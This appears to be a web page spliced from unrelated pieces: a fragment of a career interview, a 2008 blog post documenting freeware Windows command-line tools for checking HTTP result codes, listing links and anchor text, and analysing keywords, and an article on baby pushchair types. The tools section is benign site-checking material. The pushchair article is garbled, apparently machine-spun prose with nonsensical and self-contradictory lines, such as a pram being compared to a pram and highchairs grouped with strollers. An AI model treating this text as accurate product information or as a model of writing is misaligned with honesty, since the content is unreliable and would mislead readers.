I’m an extremely outdoors person, and I thought back then that if I studied IT or engineering I’d be stuck in front of a computer all day - but I now realize that that’s not really the case at all. Shucks, if I’m honest with myself, I LIKE spending time in front of the computer. I’ve come to realise that it’s the life / work balance that’s important - if you don’t have one, you tend to lose out on the other.

So with Ag, I just ended up naturally gravitating towards work that required me to be ’stuck’ in front of a computer all day anyway, but getting paid poorly for it, so the opportunities to go outside and do adventurous things in your spare time were limited.

I’ve had some massive, great interesting experiences with the route I chose back then, most of which I don’t regret, but if I’d done IT or Eng instead of Ag, I think I’d be in a better place, career wise. You mention “good stock” - it’s funny that, because luckily I realized early that this wasn’t what I wanted to do long term, and tended to invest my wages well - so I’ve managed to have a decent lifestyle during the recent ‘challenges’ which is LUCKY

Is there anything you’d like to add?

John Congrats on the new job, and I’m looking forward to achieving a dream like that myself soon, too - good on you mate! :-)

Thank you very much for your time and the replies, Matt!

A set of command-line Windows website tools

3 Sep 2008 In: Uncategorized

If you have to do things over and over again, it’s a good idea to use a tool to make things easier. Windows is a bit limited (or very - when compared to Linux) when it comes to batch file scripts and “wget” is limited to what it can do right out the box, so I sat down and wrote a few command line tools to help me with some of the website checks that I like to do.

The tools I included in this set can do the following:

  • Check the result codes for a URL (and follow in the case of a redirect) - or for a list of URLs
  • Create a list of the links found on a URL (or just particular ones)
  • Create a list of the links and anchor texts found on a URL (or just particular ones)
  • Create a simple keyword analysis of the indexable content on a URL

You can get the down from here (requires the Windows .NET runtime v1.1):

  • WebToolbox.zip (140kb)

WebResult

This tool accesses a URL and shows the result code that was returned. If the status is a redirect, it will display the redirection location and optionally follow it to check the final result code. It may be used with a list of URLs. The output is tab-delimited.

Usage:
WebResult [options] (URL|urllist.txt)
Options:
–referer|-r [referrer] (default: none)
–user-agent|-u [user-agent] (default: “WebResult”)
–follow-redirect|-f (default: not)
–headers|-h (displays the full response headers)
–verbose|-v

Example:
Check for correct canonical redirect:
Webresult http://johnmu.com/
Webresult http://www.johnmu.com/

WebLinks

This tool lists the links that are found on a URL. Note that it has an integrated HTML/XHTML parser - if the code on the page is not fully compliant, there is a chance of the parser not recognizing all links (it is fairly fail-safe, though).

This tool can use a cached version of the URL (from either this tool or one of the other ones) to save bandwidth. The cached versions are saved in the user’s temp-folder.

You have the choice of only listing domain outbound or insite links (to help simplify the output). Additionally links with the HTML microformat “rel=nofollow” may be marked as such. The output is in alphabetical order.

Usage:
WebLinks [options] (URL|urllist.txt)
Options:
–referer [referrer] (default: none)
–user-agent [user-agent] (default: “WebLinks”
–insite-only|-i (default: both in + out)
–outbound-only|-o (default: both in + out)
–ignore-nofollow|-n (default: off)
–cache|-c (default: off)
–verbose|-v (default: off)

Example:
Check the outbound links on a site.
WebLinks -o http://johnmu.com/

WebAnchors

This tool lists the links and anchor text as found on a URL. It uses the same HTML/XHTML parser as WebLinks. It can be used to find certain links (based on the URL, domain name, URL-snippets, or even parts of the anchor text). If the anchor for a link is an image, it will use the appropriate ALT-text, etc.

Usage:
WebAnchors [options] (URL|urllist.txt)
Options:
–referer|-r [referrer] (default: none)
–user-agent|-u [user-agent] (default: “WebLinks”
–find-url|-f http://URL
–find-domain|-d DOMAIN.TLD
–find-anchor|-a TEXT
–find-url-snippet|-s TEXT
–url-only|-o (default: show anchor text as well)
–skip-nofollow|-n (default: off)
–cache|-c (default: off)
–verbose|-v (default: off)

Example:
Check the links with “Google” in the anchor text.
WebAnchors -s “Google” http://johnmu.com/

WebKeywords

This tool does a simple keyword analysis on the indexable content of a URL. It also uses the above HTML/XHTML parser to extract the indexable text. It is possible to get single-word keywords or to use multi-word-phrases. The output is tab-delimited for re-use.

Usage:
WebKeywords [options] (URL|urllist.txt)
Options:
–referer|-r [referrer] (default: none)
–user-agent|-u [user-agent] (default: “WebLinks”
–verbose|-v (default: off)
–words|-w [NUM] (phrases with number of words, default: 1)
–ignore-numbers|-n (default: off)
–cache|-c (cache web page, default: off)

Example:
Extract 3-word keyphrases from a page:
Webkeywords -w 3 http://johnmu.com/

Combined usage of these tools

Find common keyphrases on sites linked from a page (uses a temporary file to store the URLs):

webanchors -c -o -a “Google” http://johnmu.com >temp.txt
webkeywords -c -w 3 temp.txt

Check result codes of all URLs linked from a page:

weblinks -c http://johnmu.com >temp.txt
webresult temp.txt >links.tsv

Compare result codes for multiple accesses:

echo. >results.tsv
for /L %i IN (1,1,100) DO webresult http://johnmu.com/ >>results.tsv

or more complicated to test a hack based on the referrer (all on one line):

for /L %i IN (1,1,100) DO webresult -u “Mozilla/5.0 (Windows; U) Gecko/20070725 Firefox/2.0.0.6″ -r http://www.google.com/search?q=johnmu http://johnmu.com/ >>results.tsv

I’d love to hear about your usage of these tools :) .

Baby obaby pushchairs, petite star pram’s or pushchairs as they are also identified, are becoming more and more elaborate in their design. This critique outlines the essential concept of each type of baby pushchair and what advantages or disadvantages they have.

For a established baby, you have the choice of going for a traditional pram or a multi purpose stroller, which can do both jobs with a few adjustments. A pram looks nice but some of the better ranges can be expensive, specially as a pram may only be used for the initial few weeks. However, a pram can doubled up as a second cot until the baby gets larger.

A second issue the pram has compared to the pram is its size. They are ideal for walking on a rough path or in the park but they are almost unworkable to get on most coaches and they are also hard to steer in a busy shopping area.

In recent years, highchairs and baby pushchair or baby carriage has become more unpopular as they are generally more compact, light but still offer the stability of a pram. A baby buggy can also be used for many more months than a pram, even for times depending on the type you go for.

Standard Baby Strollers - The usual stroller looks the most like the traditional pram out of all the designs. It is also the type that can do the most number of tasks. As well as a buggy, it normally has a large amount of space for bags and accessories and also often comes with a detachable cot or newborn carrier. A good all-rounder.

Umbrella Baby Strollers / Buggies - The umbrella baby buggy is the lightest and most compact of them all, and probably the most popular for those reasons. These strollers are easier to take on busses, trains and will fit easily into the car boot. They in general come with a rain hood and a small carrying tray / net underneath.

There is an even lighter version of this pram, which doesn’t have a hood or any carrying compartments, it’s very transportable but you have to hope it doesn’t rain!

All Terrain Baby Strollers - This type of baby buggy is often a 3 wheeler and is the most stylish of the bunch. In fact, many maternity go for this type for the manner division as much as all else. They can often be more pricey due to their smooth design but do offer a comfortable ride for both passenger and pusher. Bear in mind that many of these strollers are often heavier than ordinary brands.

Jogging Baby Strollers - Like the all terrain buggy, these have air filled tires, which of course can puncture. These will impart a smoother ride and proficient of tackling rougher all weather. The guess is you can keep fit while exercising your youngster, as long as the baby is old enough.

Each baby stroller offers topography, which may or may not be suitable for you, so when you buy your pushchair, keep in mind how and where you are chosing to use it and you won’t go far improper.